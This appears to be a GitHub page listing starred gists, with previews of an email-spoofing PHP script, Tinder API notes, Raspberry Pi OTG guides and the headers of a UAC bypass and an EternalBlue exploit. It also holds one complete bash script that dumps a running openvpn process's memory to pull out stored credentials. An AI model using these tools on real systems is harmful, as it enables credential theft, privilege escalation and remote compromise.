Skip to content

Instantly share code, notes, and snippets.

View Random1984's full-sized avatar

Random1984

  • Palookaville
View GitHub Profile
@xpressyoo
xpressyoo / email-spoofing.php
Created February 19, 2012 01:23
Email Spoofing Example (Educational Purposes only)
<?
/*
Email Spoofing script (PHP). For Educational Purposes only.
To note that capabilities of the script have been intentionally limited.
This work is licensed under a MIT License. Copyright 2012 Florian Bersier
*/
// Get posted data into local variables
$EmailFrom = Trim(stripslashes($_POST['EmailFrom'])); // Your email, e.g. [email protected]
@rtt
rtt / tinder-api-documentation.md
Last active October 17, 2024 17:55
Tinder API Documentation

Tinder API documentation

Note: this was written in April/May 2014 and the API may has definitely changed since. I have nothing to do with Tinder, nor its API, and I do not offer any support for anything you may build on top of this. Proceed with caution

http://rsty.org/

I've sniffed most of the Tinder API to see how it works. You can use this to create bots (etc) very trivially. Some example python bot code is here -> https://gist.github.com/rtt/5a2e0cfa638c938cca59 (horribly quick and dirty, you've been warned!)

@Lazza
Lazza / README.md
Last active October 16, 2024 08:17
VPNGate Python script

This script is NOT MAINTAINED

This snippet of code was posted in 2014 and slightly revised in 2016 and 2017. It was more of a quick'n'dirty script than a polished tool. It is made only for Linux and in Python 2, which has since become outdated.

I currently do not use it, and I suggest you avoid it as well. Please do not expect support for using this script.

🔥 If you need an alternative, @glaucocustodio has kindly suggested EasyVPN in this comment.

The rest of the README is left for historical purposed.

@jesusprubio
jesusprubio / gist:8f092af4ca252e252eab
Last active April 12, 2023 15:02
Proposal: A Node.js penetration test framework

Proposal: Node.js penetration test framework

Hi guys! Since I started to write Bluebox-ng I've been tracking the different security projects I found written in Node.js. Now we've published the first stable version we think it's the right moment to speak among us (and, of course, everyone interested in it :).

Why?

  • I think we're rewriting the same stuff in our respective projects again and again. For example, almost any tool supports IPv6 because the functions we need are still not present in the Node core and the libraries I found (IMHO) were not enough.
  • There're different projects implementing exactly the same thing, ie: port scanners.
  • We're working in a too new environment, so we need to make it together.
#!/bin/bash
# This little hack-job will grab credentials from a running openvpn process in Linux
# Keep in mind this won't work if the user used the --auth-nocache flag
pid=$(ps -efww | grep -v grep | grep openvpn | awk '{print $2}')
echo $pid | grep rw-p /proc/$pid/maps | sed -n 's/^\([0-9a-f]*\)-\([0-9a-f]*\) .*$/\1 \2/p' | while read start stop; do gdb --batch-silent --silent --pid $pid -ex "dump memory $pid-$start-$stop.dump 0x$start 0x$stop"; done
echo "Your credentials should be listed below as username/password"
strings *.dump | awk 'NR>=3 && NR<=4 { print }'
rm *.dump --force
@gbaman
gbaman / HowToOTG.md
Last active November 3, 2024 17:19
Simple guide for setting up OTG modes on the Raspberry Pi Zero

Raspberry Pi Zero OTG Mode

Simple guide for setting up OTG modes on the Raspberry Pi Zero - By Andrew Mulholland (gbaman).

The Raspberry Pi Zero (and model A and A+) support USB On The Go, given the processor is connected directly to the USB port, unlike on the B, B+ or Pi 2 B, which goes via a USB hub.
Because of this, if setup to, the Pi can act as a USB slave instead, providing virtual serial (a terminal), virtual ethernet, virtual mass storage device (pendrive) or even other virtual devices like HID, MIDI, or act as a virtual webcam!
It is important to note that, although the model A and A+ can support being a USB slave, they are missing the ID pin (is tied to ground internally) so are unable to dynamically switch between USB master/slave mode. As such, they default to USB master mode. There is no easy way to change this right now.
It is also important to note, that a USB to UART serial adapter is not needed for any of these guides, as may be documented elsewhere across the int

@gbaman
gbaman / HowToOTGFast.md
Last active October 31, 2024 23:33
Simple guide for setting up OTG modes on the Raspberry Pi Zero, the fast way!

Setting up Pi Zero OTG - The quick way (No USB keyboard, mouse, HDMI monitor needed)

More details - http://blog.gbaman.info/?p=791

For this method, alongside your Pi Zero, MicroUSB cable and MicroSD card, only an additional computer is required, which can be running Windows (with Bonjour, iTunes or Quicktime installed), Mac OS or Linux (with Avahi Daemon installed, for example Ubuntu has it built in).
1. Flash Raspbian Jessie full or Raspbian Jessie Lite onto the SD card.
2. Once Raspbian is flashed, open up the boot partition (in Windows Explorer, Finder etc) and add to the bottom of the config.txt file dtoverlay=dwc2 on a new line, then save the file.
3. If using a recent release of Jessie (Dec 2016 onwards), then create a new file simply called ssh in the SD card as well. By default SSH i

function Invoke-UACBypass {
<#
.SYNOPSIS
Bypasses UAC on Windows 10 by abusing the SilentCleanup task to win a race condition, allowing for a DLL hijack without a privileged file copy.
Author: Matthew Graeber (@mattifestation), Matt Nelson (@enigma0x3)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
@VlastimilHovan
VlastimilHovan / pov.py
Created November 30, 2016 19:43
BBC microbit persistence of vision (code release)
from microbit import *
time_ = 1
time_1 = 1
axis_x = 0
#Line 8,9,10,11,12 are not needed. It is only functionality check of my LEDs.
pin16.write_digital(1)
pin15.write_digital(1)
pin14.write_digital(1)
@worawit
worawit / eternalblue8_exploit.py
Last active March 16, 2024 18:38
Eternalblue exploit for Windows 8/2012
#!/usr/bin/python
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
from impacket import smb, ntlm
from struct import pack
import sys
import socket
'''
EternalBlue exploit for Windows 8 and 2012 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)